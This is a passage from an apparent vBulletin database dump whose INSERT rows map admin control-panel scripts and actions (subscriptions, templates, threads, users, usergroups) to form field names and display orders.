'add,edit', 'adminavatar', 1, 1, 'vbulletin'), (4502, 'subscriptions', 'add,edit', 'adminprofilepic', 1, 1, 'vbulletin'), (4503, 'subscriptions', 'add,edit', 'title', 10, 1, 'vbulletin'), (4504, 'subscriptions', 'add,edit', 'description', 20, 1, 'vbulletin'), (4505, 'subscriptions', 'add,edit', 'active', 30, 1, 'vbulletin'), (4506, 'subscriptions', 'add,edit', 'length', 40, 1, 'vbulletin'), (4507, 'subscriptions', 'add,edit', 'sub[cost][usd]', 50, 1, 'vbulletin'), (4508, 'subscriptions', 'add,edit', 'sub[cost][gbp]', 60, 1, 'vbulletin'), (4509, 'subscriptions', 'add,edit', 'sub[cost][eur]', 70, 1, 'vbulletin'), (4510, 'subscriptions', 'add,edit', 'nusergroupid', 80, 1, 'vbulletin'), (4511, 'subscriptions', 'add,edit', 'membergroup', 90, 1, 'vbulletin'), (4512, 'subscriptions', 'add,edit', 'tax', 100, 1, 'vbulletin'), (4513, 'subscriptions', 'add,edit', 'shipping', 110, 1, 'vbulletin'), (4514, 'subscriptions', 'add,edit', 'displayorder', 115, 1, 'vbulletin'), (4515, 'subscriptions', 'add,edit', 'recurring', 120, 1, 'vbulletin'), (4516, 'subscriptions', 'adjust', '', 1, 1, 'vbulletin'), (4517, 'subscriptions', 'adjust', 'username', 5, 1, 'vbulletin'), (4518, 'subscriptions', 'adjust', 'regdate', 10, 1, 'vbulletin'), (4519, 'subscriptions', 'adjust', 'expirydate', 20, 1, 'vbulletin'), (4520, 'subscriptions', 'adjust', 'status', 30, 1, 'vbulletin'), (4521, 'subscriptions', 'api', '', 1, 1, 'vbulletin'), (4522, 'subscriptions', 'apiadd', '', 1, 1, 'vbulletin'), (4523, 'subscriptions', 'apiadd,apiedit', 'title', 10, 1, 'vbulletin'), (4524, 'subscriptions', 'apiadd,apiedit', 'active', 20, 1, 'vbulletin'), (4525, 'subscriptions', 'apiadd,apiedit', 'classname', 30, 1, 'vbulletin'), (4526, 'subscriptions', 'apiadd,apiedit', 'currency', 40, 1, 'vbulletin'), (4527, 'subscriptions', 'apiadd,apiedit', 'recurring', 50, 1, 'vbulletin'), (4528, 'subscriptions', 'apiedit', '', 1, 1, 'vbulletin'), (4529, 'subscriptions', 'apirem', '', 1, 1, 'vbulletin'), (4530, 'subscriptions', 'edit', '', 1, 1, 'vbulletin'), (4531, 'subscriptions', 'find', '', 1, 1, 'vbulletin'), (4532, 'subscriptions', 'modify', '', 1, 1, 'vbulletin'), (4533, 'subscriptions', 'remove', '', 1, 1, 'vbulletin'), (4534, 'subscriptions', 'transactions', 'currency', 1, 1, 'vbulletin'), (4535, 'subscriptions', 'transactions', 'end', 1, 1, 'vbulletin'), (4536, 'subscriptions', 'transactions', 'exact', 1, 1, 'vbulletin'), (4537, 'subscriptions', 'transactions', 'orderby', 1, 1, 'vbulletin'), (4538, 'subscriptions', 'transactions', 'paymentapiid', 1, 1, 'vbulletin'), (4539, 'subscriptions', 'transactions', 'scope', 1, 1, 'vbulletin'), (4540, 'subscriptions', 'transactions', 'start', 1, 1, 'vbulletin'), (4541, 'subscriptions', 'transactions', 'state', 1, 1, 'vbulletin'), (4542, 'subscriptions', 'transactions', 'subscriptionid', 1, 1, 'vbulletin'), (4543, 'subscriptions', 'transactions', 'transactionid', 1, 1, 'vbulletin'), (4544, 'subscriptions', 'transactions', 'username', 1, 1, 'vbulletin'), (4545, 'template', '', '', 1, 1, 'vbulletin'), (4546, 'template', 'add', 'dostyleid', 10, 1, 'vbulletin'), (4547, 'template', 'add,edit', '', 1, 1, 'vbulletin'), (4548, 'template', 'add,edit', 'title', 20, 1, 'vbulletin'), (4549, 'template', 'add,edit', 'template', 30, 1, 'vbulletin'), (4550, 'template', 'addstyle', '', 1, 1, 'vbulletin'), (4551, 'template', 'addstyle,editstyle,files', 'parentid', 10, 1, 'vbulletin'), (4552, 'template', 'addstyle,editstyle,files', 'title', 20, 1, 'vbulletin'), (4553, 'template', 'addstyle,editstyle,files', 'userselect', 30, 1, 'vbulletin'), (4554, 'template', 'addstyle,editstyle,files', 'displayorder', 40, 1, 'vbulletin'), (4555, 'template', 'delete', '', 1, 1, 'vbulletin'), (4556, 'template', 'deletestyle', '', 1, 1, 'vbulletin'), (4557, 'template', 'editstyle', '', 1, 1, 'vbulletin'), (4558, 'template', 'files', '', 1, 1, 'vbulletin'), (4559, 'template', 'files', 'dostyleid', 10, 1, 'vbulletin'), (4560, 'template', 'files', 'product', 15, 1, 'vbulletin'), (4561, 'template', 'files', 'filename', 30, 1, 'vbulletin'), (4562, 'template', 'files', 'mode', 40, 1, 'vbulletin'), (4563, 'template', 'files', 'stylefile', 50, 1, 'vbulletin'), (4564, 'template', 'files', 'serverfile', 60, 1, 'vbulletin'), (4565, 'template', 'files', 'overwritestyleid', 70, 1, 'vbulletin'), (4566, 'template', 'files', 'anyversion', 80, 1, 'vbulletin'), (4567, 'template', 'findupdates', '', 1, 1, 'vbulletin'), (4568, 'template', 'history', '', 1, 1, 'vbulletin'), (4569, 'template', 'historysubmit', '', 1, 1, 'vbulletin'), (4570, 'template', 'modify', '', 1, 1, 'vbulletin'), (4571, 'template', 'rebuild', '', 1, 1, 'vbulletin'), (4572, 'template', 'revertall', '', 1, 1, 'vbulletin'), (4573, 'template', 'search', '', 1, 1, 'vbulletin'), (4574, 'template', 'search', 'searchset', 10, 1, 'vbulletin'), (4575, 'template', 'search', 'searchstring', 20, 1, 'vbulletin'), (4576, 'template', 'search', 'titlesonly', 30, 1, 'vbulletin'), (4577, 'template', 'search', 'dostyleid', 40, 1, 'vbulletin'), (4578, 'template', 'search', 'replacestring', 50, 1, 'vbulletin'), (4579, 'template', 'search', 'test', 60, 1, 'vbulletin'), (4580, 'template', 'search', 'regex', 70, 1, 'vbulletin'), (4581, 'template', 'search', 'case_insensitive', 80, 1, 'vbulletin'), (4582, 'template', 'view', '', 1, 1, 'vbulletin'), (4583, 'thread', '', '', 1, 1, 'vbulletin'), (4584, 'thread', 'dothreads,pruneuser', '', 1, 1, 'vbulletin'), (4585, 'thread', 'dothreadssel', '', 1, 1, 'vbulletin'), (4586, 'thread', 'dovotes', '', 1, 1, 'vbulletin'), (4587, 'thread', 'killpoll', '', 1, 1, 'vbulletin'), (4588, 'thread', 'killpoll', 'threadid', 10, 1, 'vbulletin'), (4589, 'thread', 'move', '', 1, 1, 'vbulletin'), (4590, 'thread', 'move', 'destforumid', 5, 1, 'vbulletin'), (4591, 'thread', 'prune', '', 1, 1, 'vbulletin'), (4592, 'thread', 'prune', 'username', 180, 1, 'vbulletin'), (4593, 'thread', 'prune,move', 'originaldaysolder', 10, 1, 'vbulletin'), (4594, 'thread', 'prune,move', 'originaldaysnewer', 20, 1, 'vbulletin'), (4595, 'thread', 'prune,move', 'lastdaysolder', 30, 1, 'vbulletin'), (4596, 'thread', 'prune,move', 'lastdaysnewer', 40, 1, 'vbulletin'), (4597, 'thread', 'prune,move', 'repliesleast', 50, 1, 'vbulletin'), (4598, 'thread', 'prune,move', 'repliesmost', 60, 1, 'vbulletin'), (4599, 'thread', 'prune,move', 'viewsleast', 70, 1, 'vbulletin'), (4600, 'thread', 'prune,move', 'viewsmost', 80, 1, 'vbulletin'), (4601, 'thread', 'prune,move', 'issticky', 90, 1, 'vbulletin'), (4602, 'thread', 'prune,move', 'state', 92, 1, 'vbulletin'), (4603, 'thread', 'prune,move', 'status', 94, 1, 'vbulletin'), (4604, 'thread', 'prune,move', 'posteduser', 140, 1, 'vbulletin'), (4605, 'thread', 'prune,move', 'titlecontains', 150, 1, 'vbulletin'), (4606, 'thread', 'prune,move', 'forumid', 160, 1, 'vbulletin'), (4607, 'thread', 'prune,move', 'subforums', 170, 1, 'vbulletin'), (4608, 'thread', 'prune,move', 'prefixid', 200, 1, 'vbulletin'), (4609, 'thread', 'pruneusersel', '', 1, 1, 'vbulletin'), (4610, 'thread', 'removepoll', '', 1, 1, 'vbulletin'), (4611, 'thread', 'tagmerge', 'tagtext', 1, 1, 'vbulletin'), (4612, 'thread', 'tags', 'tagtext', 1, 1, 'vbulletin'), (4613, 'thread', 'unsubscribe', '', 1, 1, 'vbulletin'), (4614, 'thread', 'unsubscribe', 'ids', 10, 1, 'vbulletin'), (4615, 'thread', 'unsubscribe', 'username', 20, 1, 'vbulletin'), (4616, 'thread', 'unsubscribe', 'daysprune', 30, 1, 'vbulletin'), (4617, 'thread', 'unsubscribe', 'forumid', 40, 1, 'vbulletin'), (4618, 'thread', 'votes', '', 1, 1, 'vbulletin'), (4619, 'thread', 'votes', 'pollid', 10, 1, 'vbulletin'), (4620, 'thread', 'votes', 'threadtitle', 20, 1, 'vbulletin'), (4621, 'user', '', '', 1, 1, 'vbulletin'), (4622, 'user', 'add', '', 1, 1, 'vbulletin'), (4623, 'user', 'add', 'password', 30, 1, 'vbulletin'), (4624, 'user', 'add,edit', 'adminavatar', 1, 1, 'vbulletin'), (4625, 'user', 'add,edit', 'adminprofilepic', 1, 1, 'vbulletin'), (4626, 'user', 'add,edit', 'ipoints', 1, 1, 'vbulletin'), (4627, 'user', 'add,edit', 'vm_enable', 1, 1, 'vbulletin'), (4628, 'user', 'add,edit', 'warnings', 10, 1, 'vbulletin'), (4629, 'user', 'add,edit', 'infractions', 20, 1, 'vbulletin'), (4630, 'user', 'add,edit', 'username', 20, 1, 'vbulletin'), (4631, 'user', 'add,edit', 'email', 40, 1, 'vbulletin'), (4632, 'user', 'add,edit', 'languageid', 50, 1, 'vbulletin'), (4633, 'user', 'add,edit', 'usertitle', 60, 1, 'vbulletin'), (4634, 'user', 'add,edit', 'customtitle', 70, 1, 'vbulletin'), (4635, 'user', 'add,edit', 'homepage', 80, 1, 'vbulletin'), (4636, 'user', 'add,edit', 'birthday', 90, 1, 'vbulletin'), (4637, 'user', 'add,edit', 'showbirthday', 95, 1, 'vbulletin'), (4638, 'user', 'add,edit', 'signature', 100, 1, 'vbulletin'), (4639, 'user', 'add,edit', 'icq', 110, 1, 'vbulletin'), (4640, 'user', 'add,edit', 'aim', 120, 1, 'vbulletin'), (4641, 'user', 'add,edit', 'yahoo', 130, 1, 'vbulletin'), (4642, 'user', 'add,edit', 'msn', 140, 1, 'vbulletin'), (4643, 'user', 'add,edit', 'skype', 145, 1, 'vbulletin'), (4644, 'user', 'add,edit', 'coppauser', 150, 1, 'vbulletin'), (4645, 'user', 'add,edit', 'parentemail', 160, 1, 'vbulletin'), (4646, 'user', 'add,edit', 'posts', 170, 1, 'vbulletin'), (4647, 'user', 'add,edit', 'referrerid', 180, 1, 'vbulletin'), (4648, 'user', 'add,edit', 'ipaddress', 190, 1, 'vbulletin'), (4649, 'user', 'add,edit', 'usergroupid', 200, 1, 'vbulletin'), (4650, 'user', 'add,edit', 'membergroupids', 210, 1, 'vbulletin'), (4651, 'user', 'add,edit', 'showreputation', 220, 1, 'vbulletin'), (4652, 'user', 'add,edit', 'reputation', 230, 1, 'vbulletin'), (4653, 'user', 'add,edit', 'reputationpower', 235, 1, 'vbulletin'), (4654, 'user', 'add,edit', 'adminemail', 240, 1, 'vbulletin'), (4655, 'user', 'add,edit', 'showemail', 250, 1, 'vbulletin'), (4656, 'user', 'add,edit', 'invisible', 260, 1, 'vbulletin'), (4657, 'user', 'add,edit', 'showvcard', 265, 1, 'vbulletin'), (4658, 'user', 'add,edit', 'receivepm', 270, 1, 'vbulletin'), (4659, 'user', 'add,edit', 'receivepmbuddies', 275, 1, 'vbulletin'), (4660, 'user', 'add,edit', 'emailonpm', 280, 1, 'vbulletin'), (4661, 'user', 'add,edit', 'pmpopup', 290, 1, 'vbulletin'), (4662, 'user', 'add,edit', 'showsignatures', 300, 1, 'vbulletin'), (4663, 'user', 'add,edit', 'showavatars', 310, 1, 'vbulletin'), (4664, 'user', 'add,edit', 'showimages', 320, 1, 'vbulletin'), (4665, 'user', 'add,edit', 'showusercss', 323, 1, 'vbulletin'), (4666, 'user', 'add,edit', 'receivefriendemailrequest', 326, 1, 'vbulletin'), (4667, 'user', 'add,edit', 'autosubscribe', 330, 1, 'vbulletin'), (4668, 'user', 'add,edit', 'threadedmode', 340, 1, 'vbulletin'), (4669, 'user', 'add,edit', 'showvbcode', 350, 1, 'vbulletin'), (4670, 'user', 'add,edit', 'styleid', 360, 1, 'vbulletin'), (4671, 'user', 'add,edit', 'timezoneoffset', 370, 1, 'vbulletin'), (4672, 'user', 'add,edit', 'dstauto', 380, 1, 'vbulletin'), (4673, 'user', 'add,edit', 'dstonoff', 390, 1, 'vbulletin'), (4674, 'user', 'add,edit', 'daysprune', 400, 1, 'vbulletin'), (4675, 'user', 'add,edit', 'joindate', 410, 1, 'vbulletin'), (4676, 'user', 'add,edit', 'lastactivity', 430, 1, 'vbulletin'), (4677, 'user', 'add,edit', 'lastpost', 440, 1, 'vbulletin'), (4678, 'user', 'changehistory', '', 1, 1, 'vbulletin'), (4679, 'user', 'doips', '', 1, 1, 'vbulletin'), (4680, 'user', 'doips', 'ipaddress', 10, 1, 'vbulletin'), (4681, 'user', 'doips', 'username', 20, 1, 'vbulletin'), (4682, 'user', 'doips', 'depth', 30, 1, 'vbulletin'), (4683, 'user', 'edit', '', 1, 1, 'vbulletin'), (4684, 'user', 'edit', 'receivepmbuddies', 1, 1, 'vbulletin'), (4685, 'user', 'edit', 'vm_contactonly', 1, 1, 'vbulletin'), (4686, 'user', 'edit', 'password', 30, 1, 'vbulletin'), (4687, 'user', 'editaccess', '', 1, 1, 'vbulletin'), (4688, 'user', 'emailpassword', '', 1, 1, 'vbulletin'), (4689, 'user', 'find', '', 1, 1, 'vbulletin'), (4690, 'user', 'find2', '', 1, 1, 'vbulletin'), (4691, 'user', 'moderate', '', 1, 1, 'vbulletin'), (4692, 'user', 'moderate', 'send_validated', 10, 1, 'vbulletin'), (4693, 'user', 'moderate', 'send_deleted', 20, 1, 'vbulletin'), (4694, 'user', 'modify', '', 1, 1, 'vbulletin'), (4695, 'user', 'modify', 'username', 70, 1, 'vbulletin'), (4696, 'user', 'modify', 'usergroupid', 90, 1, 'vbulletin'), (4697, 'user', 'modify', 'membergroup', 100, 1, 'vbulletin'), (4698, 'user', 'modify', 'adminemail', 105, 1, 'vbulletin'), (4699, 'user', 'modify', 'email', 110, 1, 'vbulletin'), (4700, 'user', 'modify', 'parentemail', 120, 1, 'vbulletin'), (4701, 'user', 'modify', 'coppauser', 130, 1, 'vbulletin'), (4702, 'user', 'modify', 'homepage', 140, 1, 'vbulletin'), (4703, 'user', 'modify', 'icq', 150, 1, 'vbulletin'), (4704, 'user', 'modify', 'aim', 160, 1, 'vbulletin'), (4705, 'user', 'modify', 'yahoo', 170, 1, 'vbulletin'), (4706, 'user', 'modify', 'msn', 175, 1, 'vbulletin'), (4707, 'user', 'modify', 'skype', 176, 1, 'vbulletin'), (4708, 'user', 'modify', 'signature', 180, 1, 'vbulletin'), (4709, 'user', 'modify', 'usertitle', 190, 1, 'vbulletin'), (4710, 'user', 'modify', 'joindateafter', 200, 1, 'vbulletin'), (4711, 'user', 'modify', 'joindatebefore', 210, 1, 'vbulletin'), (4712, 'user', 'modify', 'lastactivityafter', 213, 1, 'vbulletin'), (4713, 'user', 'modify', 'lastactivitybefore', 217, 1, 'vbulletin'), (4714, 'user', 'modify', 'lastvisitafter', 220, 1, 'vbulletin'), (4715, 'user', 'modify', 'lastvisitbefore', 230, 1, 'vbulletin'), (4716, 'user', 'modify', 'lastpostafter', 240, 1, 'vbulletin'), (4717, 'user', 'modify', 'lastpostbefore', 250, 1, 'vbulletin'), (4718, 'user', 'modify', 'birthdayafter', 260, 1, 'vbulletin'), (4719, 'user', 'modify', 'birthdaybefore', 270, 1, 'vbulletin'), (4720, 'user', 'modify', 'postslower', 280, 1, 'vbulletin'), (4721, 'user', 'modify', 'postsupper', 290, 1, 'vbulletin'), (4722, 'user', 'modify', 'reputationlower', 300, 1, 'vbulletin'), (4723, 'user', 'modify', 'reputationupper', 310, 1, 'vbulletin'), (4724, 'user', 'modify', 'ipaddress', 320, 1, 'vbulletin'), (4725, 'user', 'modify', 'warningslower', 320, 1, 'vbulletin'), (4726, 'user', 'modify', 'warningsupper', 340, 1, 'vbulletin'), (4727, 'user', 'modify', 'infractionslower', 350, 1, 'vbulletin'), (4728, 'user', 'modify', 'infractionsupper', 360, 1, 'vbulletin'), (4729, 'user', 'modify', 'pointslower', 370, 1, 'vbulletin'), (4730, 'user', 'modify', 'pointsupper', 380, 1, 'vbulletin'), (4731, 'user', 'modify', 'display[username]', 390, 1, 'vbulletin'), (4732, 'user', 'modify', 'useridlower', 390, 1, 'vbulletin'), (4733, 'user', 'modify', 'useridupper', 395, 1, 'vbulletin'), (4734, 'user', 'modify', 'display[options]', 400, 1, 'vbulletin'), (4735, 'user', 'modify', 'display[usergroup]', 410, 1, 'vbulletin'), (4736, 'user', 'modify', 'display[email]', 420, 1, 'vbulletin'), (4737, 'user', 'modify', 'display[parentemail]', 430, 1, 'vbulletin'), (4738, 'user', 'modify', 'display[coppauser]', 440, 1, 'vbulletin'), (4739, 'user', 'modify', 'display[homepage]', 450, 1, 'vbulletin'), (4740, 'user', 'modify', 'display[icq]', 460, 1, 'vbulletin'), (4741, 'user', 'modify', 'display[aim]', 470, 1, 'vbulletin'), (4742, 'user', 'modify', 'display[yahoo]', 480, 1, 'vbulletin'), (4743, 'user', 'modify', 'display[msn]', 490, 1, 'vbulletin'), (4744, 'user', 'modify', 'display[signature]', 500, 1, 'vbulletin'), (4745, 'user', 'modify', 'display[usertitle]', 510, 1, 'vbulletin'), (4746, 'user', 'modify', 'display[joindate]', 520, 1, 'vbulletin'), (4747, 'user', 'modify', 'display[lastactivity]', 523, 1, 'vbulletin'), (4748, 'user', 'modify', 'display[lastpost]', 540, 1, 'vbulletin'), (4749, 'user', 'modify', 'display[posts]', 550, 1, 'vbulletin'), (4750, 'user', 'modify', 'display[reputation]', 560, 1, 'vbulletin'), (4751, 'user', 'modify', 'display[ipaddress]', 570, 1, 'vbulletin'), (4752, 'user', 'modify', 'display[birthday]', 580, 1, 'vbulletin'), (4753, 'user', 'modify', 'orderby', 590, 1, 'vbulletin'), (4754, 'user', 'modify', 'limitstart', 610, 1, 'vbulletin'), (4755, 'user', 'modify', 'limitnumber', 620, 1, 'vbulletin'), (4756, 'user', 'prune', '', 1, 1, 'vbulletin'), (4757, 'user', 'prune', 'usergroupid', 20, 1, 'vbulletin'), (4758, 'user', 'prune', 'daysprune', 30, 1, 'vbulletin'), (4759, 'user', 'prune', 'joindate', 40, 1, 'vbulletin'), (4760, 'user', 'prune', 'minposts', 50, 1, 'vbulletin'), (4761, 'user', 'prune', 'order', 60, 1, 'vbulletin'), (4762, 'user', 'pruneusers', '', 1, 1, 'vbulletin'), (4763, 'user', 'remove', '', 1, 1, 'vbulletin'), (4764, 'usergroup', '', '', 1, 1, 'vbulletin'), (4765, 'usergroup', 'add', '', 1, 1, 'vbulletin'), (4766, 'usergroup', 'add', 'ugid_base', 750, 1, 'vbulletin'), (4767, 'usergroup', 'add,edit', 'cananimateavatar', 1, 1, 'vbulletin'), (4768, 'usergroup', 'add,edit', 'cananimateprofilepic', 1, 1, 'vbulletin'), (4769, 'usergroup', 'edit', 'canemailmember', 1, 1, 'vbulletin'), (4770, 'usergroup', 'edit', 'cangivearbinfraction', 1, 1, 'vbulletin'), (4771, 'usergroup', 'add,edit', 'cansearchft_bool', 1, 1, 'vbulletin'), (4772, 'usergroup', 'add,edit', 'canusefriends', 1, 1, 'vbulletin'), (4773, 'usergroup', 'add,edit', 'canviewthreads', 1, 1, 'vbulletin'), (4774, 'usergroup', 'add,edit', 'isnotmoderated', 1, 1, 'vbulletin'), (4775, 'usergroup', 'add,edit', 'title', 10, 1, 'vbulletin'), (4776, 'usergroup', 'add,edit', 'description', 20, 1, 'vbulletin'), (4777, 'usergroup', 'add,edit', 'usertitle', 30, 1, 'vbulletin'), (4778, 'usergroup', 'add,edit', 'htmltags', 40, 1, 'vbulletin'), (4779, 'usergroup', 'add,edit', 'passwordexpires', 50, 1, 'vbulletin'), (4780, 'usergroup', 'add,edit', 'passwordhistory', 60, 1, 'vbulletin'), (4781, 'usergroup', 'add,edit', 'showgroup', 70, 1, 'vbulletin'), (4782, 'usergroup', 'add,edit', 'showbirthday', 80, 1, 'vbulletin'), (4783, 'usergroup', 'add,edit', 'showmemberlist', 90, 1, 'vbulletin'), (4784, 'usergroup', 'add,edit', 'allowmembergroups', 100, 1, 'vbulletin'), (4785, 'usergroup', 'add,edit', 'isnotbannedgroup', 110, 1, 'vbulletin'), (4786, 'usergroup', 'add,edit', 'ispublicgroup', 120, 1, 'vbulletin'), (4787, 'usergroup', 'add,edit', 'canoverride', 130, 1, 'vbulletin'), (4788, 'usergroup', 'add,edit', 'canseehidden', 140, 1, 'vbulletin'), (4789, 'usergroup', 'add,edit', 'canviewmembers', 150, 1, 'vbulletin'), (4790, 'usergroup', 'add,edit', 'canmodifyprofile', 160, 1, 'vbulletin'), (4791, 'usergroup', 'add,edit', 'caninvisible', 170, 1, 'vbulletin'), (4792, 'usergroup', 'add,edit', 'showeditedby', 180, 1, 'vbulletin'), (4793, 'usergroup', 'add,edit', 'canseeraters', 190, 1, 'vbulletin'), (4794, 'usergroup', 'add,edit', 'canjoingroups', 200, 1, 'vbulletin'), (4795, 'usergroup', 'add,edit', 'canusecustomtitle', 200, 1, 'vbulletin'), (4796, 'usergroup', 'add,edit', 'canusesignature', 210, 1, 'vbulletin'), (4797, 'usergroup', 'add,edit', 'canseeprofilepic', 220, 1, 'vbulletin'), (4798, 'usergroup', 'add,edit', 'canseehiddencustomfields', 225, 1, 'vbulletin'), (4799, 'usergroup', 'add,edit', 'canview', 230, 1, 'vbulletin'), (4800, 'usergroup', 'add,edit', 'canviewothers', 240, 1, 'vbulletin'), (4801, 'usergroup', 'add,edit', 'canseedelnotice', 250, 1, 'vbulletin'), (4802, 'usergroup', 'add,edit', 'cansearch', 260, 1, 'vbulletin'), (4803, 'usergroup', 'add,edit', 'canemail', 270, 1, 'vbulletin'), (4804, 'usergroup', 'add,edit', 'cangetattachment', 280, 1, 'vbulletin'), (4805, 'usergroup', 'add,edit', 'canpostnew', 290, 1, 'vbulletin'), (4806, 'usergroup', 'add,edit', 'canreplyown', 300, 1, 'vbulletin'), (4807, 'usergroup', 'add,edit', 'canreplyothers', 310, 1, 'vbulletin'), (4808, 'usergroup', 'add,edit', 'caneditpost', 320, 1, 'vbulletin'), (4809, 'usergroup', 'add,edit', 'candeletepost', 330, 1, 'vbulletin'), (4810, 'usergroup', 'add,edit', 'canmove', 340, 1, 'vbulletin'), (4811, 'usergroup', 'add,edit', 'canopenclose', 350, 1, 'vbulletin'), (4812, 'usergroup', 'add,edit', 'candeletethread', 360, 1, 'vbulletin'), (4813, 'usergroup', 'add,edit', 'followforummoderation', 370, 1, 'vbulletin'), (4814, 'usergroup', 'add,edit', 'cantagown', 371, 1, 'vbulletin'), (4815, 'usergroup', 'add,edit', 'picturefollowforummoderation', 371, 1, 'vbulletin'), (4816, 'usergroup', 'add,edit', 'cantagothers', 372, 1, 'vbulletin'), (4817, 'usergroup', 'add,edit', 'commentfollowforummoderation', 372, 1, 'vbulletin'), (4818, 'usergroup', 'add,edit', 'candeletetagown', 373, 1, 'vbulletin'), (4819, 'usergroup', 'add,edit', 'cancreatetag', 374, 1, 'vbulletin'), (4820, 'usergroup', 'add,edit', 'canpostattachment', 390, 1, 'vbulletin'), (4821, 'usergroup', 'add,edit', 'attachlimit', 400, 1, 'vbulletin'), (4822, 'usergroup', 'add,edit', 'canpostpoll', 410, 1, 'vbulletin'), (4823, 'usergroup', 'add,edit', 'canvote', 420, 1, 'vbulletin'), (4824, 'usergroup', 'add,edit', 'canuseavatar', 430, 1, 'vbulletin'), (4825, 'usergroup', 'add,edit', 'avatarmaxwidth', 440, 1, 'vbulletin'), (4826, 'usergroup', 'add,edit', 'avatarmaxheight', 450, 1, 'vbulletin'), (4827, 'usergroup', 'add,edit', 'avatarmaxsize', 460, 1, 'vbulletin'), (4828, 'usergroup', 'add,edit', 'cansigpic', 465, 1, 'vbulletin'), (4829, 'usergroup', 'add,edit', 'cananimatesigpic', 470, 1, 'vbulletin'), (4830, 'usergroup', 'add,edit', 'canprofilepic', 470, 1, 'vbulletin'), (4831, 'usergroup', 'add,edit', 'sigpicmaxheight', 475, 1, 'vbulletin'), (4832, 'usergroup', 'add,edit', 'sigpicmaxwidth', 475, 1, 'vbulletin'), (4833, 'usergroup', 'add,edit', 'profilepicmaxwidth', 480, 1, 'vbulletin'), (4834, 'usergroup', 'add,edit', 'sigpicmaxsize', 485, 1, 'vbulletin'), (4835, 'usergroup', 'add,edit', 'profilepicmaxheight', 490, 1, 'vbulletin'), (4836, 'usergroup', 'add,edit', 'profilepicmaxsize', 500, 1, 'vbulletin'), (4837, 'usergroup', 'add,edit', 'pmquota', 510, 1, 'vbulletin'), (4838, 'usergroup', 'add,edit', 'canignorequota', 515, 1, 'vbulletin'), (4839, 'usergroup', 'add,edit', 'cantrackpm', 520, 1, 'vbulletin'), (4840, 'usergroup', 'add,edit', 'candenypmreceipts', 530, 1, 'vbulletin'), (4841, 'usergroup', 'add,edit', 'pmsendmax', 540, 1, 'vbulletin'), (4842, 'usergroup', 'add,edit', 'canviewcalendar', 550, 1, 'vbulletin'), (4843, 'usergroup', 'add,edit', 'canpostevent', 560, 1, 'vbulletin'), (4844, 'usergroup', 'add,edit', 'caneditevent', 570, 1, 'vbulletin'), (4845, 'usergroup', 'add,edit', 'candeleteevent', 580, 1, 'vbulletin'), (4846, 'usergroup', 'add,edit', 'canviewothersevent', 590, 1, 'vbulletin'), (4847, 'usergroup', 'add,edit', 'canwhosonline', 600, 1, 'vbulletin'), (4848, 'usergroup', 'add,edit', 'canwhosonlinefull', 610, 1, 'vbulletin'), (4849, 'usergroup', 'add,edit', 'canwhosonlineip', 620, 1, 'vbulletin'), (4850, 'usergroup', 'add,edit', 'canwhosonlinebad', 630, 1, 'vbulletin'), (4851, 'usergroup', 'add,edit', 'canwhosonlinelocation', 640, 1, 'vbulletin'), (4852, 'usergroup', 'add,edit', 'canviewownusernotes', 650, 1, 'vbulletin'), (4853, 'usergroup', 'add,edit', 'canmanageownusernotes', 660, 1, 'vbulletin'), (4854, 'usergroup', 'add,edit', 'canpostownusernotes', 670, 1, 'vbulletin'), (4855, 'usergroup', 'add,edit', 'canviewothersusernotes', 680, 1, 'vbulletin'), (4856, 'usergroup', 'add,edit', 'canmanageothersusernotes', 690, 1, 'vbulletin'), (4857, 'usergroup', 'add,edit', 'canpostothersusernotes', 700, 1, 'vbulletin'), (4858, 'usergroup', 'add,edit', 'caneditownusernotes', 710, 1, 'vbulletin'), (4859, 'usergroup', 'add,edit', 'canbeusernoted', 720, 1, 'vbulletin'), (4860, 'usergroup', 'add,edit', 'ismoderator', 730, 1, 'vbulletin'), (4861, 'usergroup', 'add,edit', 'cancontrolpanel', 740, 1, 'vbulletin'), (4862, 'usergroup', 'add,edit', 'cannegativerep', 750, 1, 'vbulletin'), (4863, 'usergroup', 'add,edit', 'canuserep', 750, 1, 'vbulletin'), (4864, 'usergroup', 'add,edit', 'canseeownrep', 760, 1, 'vbulletin'), (4865, 'usergroup', 'add,edit', 'canhiderep', 770, 1, 'vbulletin'), (4866, 'usergroup', 'add,edit', 'canseeothersrep', 780, 1, 'vbulletin'), (4867, 'usergroup', 'add,edit', 'sigmaxrawchars', 800, 1, 'vbulletin'), (4868, 'usergroup', 'add,edit', 'sigmaxchars', 805, 1, 'vbulletin'), (4869, 'usergroup', 'add,edit', 'sigmaxlines', 810, 1, 'vbulletin'), (4870, 'usergroup', 'add,edit', 'canbbcode', 815, 1, 'vbulletin'), (4871, 'usergroup', 'add,edit', 'canbbcodebasic', 815, 1, 'vbulletin'), (4872, 'usergroup', 'add,edit', 'canbbcodecolor', 820, 1, 'vbulletin'), (4873, 'usergroup', 'add,edit', 'canbbcodesize', 825, 1, 'vbulletin'), (4874, 'usergroup', 'add,edit', 'sigmaxsizebbcode', 830, 1, 'vbulletin'), (4875, 'usergroup', 'add,edit', 'canbbcodefont', 835, 1, 'vbulletin'), (4876, 'usergroup', 'add,edit', 'canbbcodealign', 840, 1, 'vbulletin'), (4877, 'usergroup', 'add,edit', 'canbbcodelist', 840, 1, 'vbulletin'), (4878, 'usergroup', 'add,edit', 'canbbcodelink', 850, 1, 'vbulletin'), (4879, 'usergroup', 'add,edit', 'canbbcodecode', 855, 1, 'vbulletin'), (4880, 'usergroup', 'add,edit', 'canbbcodephp', 860, 1, 'vbulletin'), (4881, 'usergroup', 'add,edit', 'canbbcodehtml', 865, 1, 'vbulletin'), (4882, 'usergroup', 'add,edit', 'canbbcodequote', 870, 1, 'vbulletin'), (4883, 'usergroup', 'add,edit', 'allowimg', 875, 1, 'vbulletin'), (4884, 'usergroup', 'add,edit', 'sigmaximages', 880, 1, 'vbulletin'), (4885, 'usergroup', 'add,edit', 'allowsmilies', 885, 1, 'vbulletin'), (4886, 'usergroup', 'add,edit', 'allowhtml', 890, 1, 'vbulletin'), (4887, 'usergroup', 'add,edit', 'candeleteownmessages', 940, 1, 'vbulletin'), (4888, 'usergroup', 'add,edit', 'canalbum', 1000, 1, 'vbulletin'), (4889, 'usergroup', 'add,edit', 'canviewalbum', 1010, 1, 'vbulletin'), (4890, 'usergroup', 'add,edit', 'albumpicmaxwidth', 1020, 1, 'vbulletin'), (4891, 'usergroup', 'add,edit', 'albumpicmaxheight', 1030, 1, 'vbulletin'), (4892, 'usergroup', 'add,edit', 'albummaxpics', 1040, 1, 'vbulletin'), (4893, 'usergroup', 'add,edit', 'albumpicmaxsize', 1040, 1, 'vbulletin'), (4894, 'usergroup', 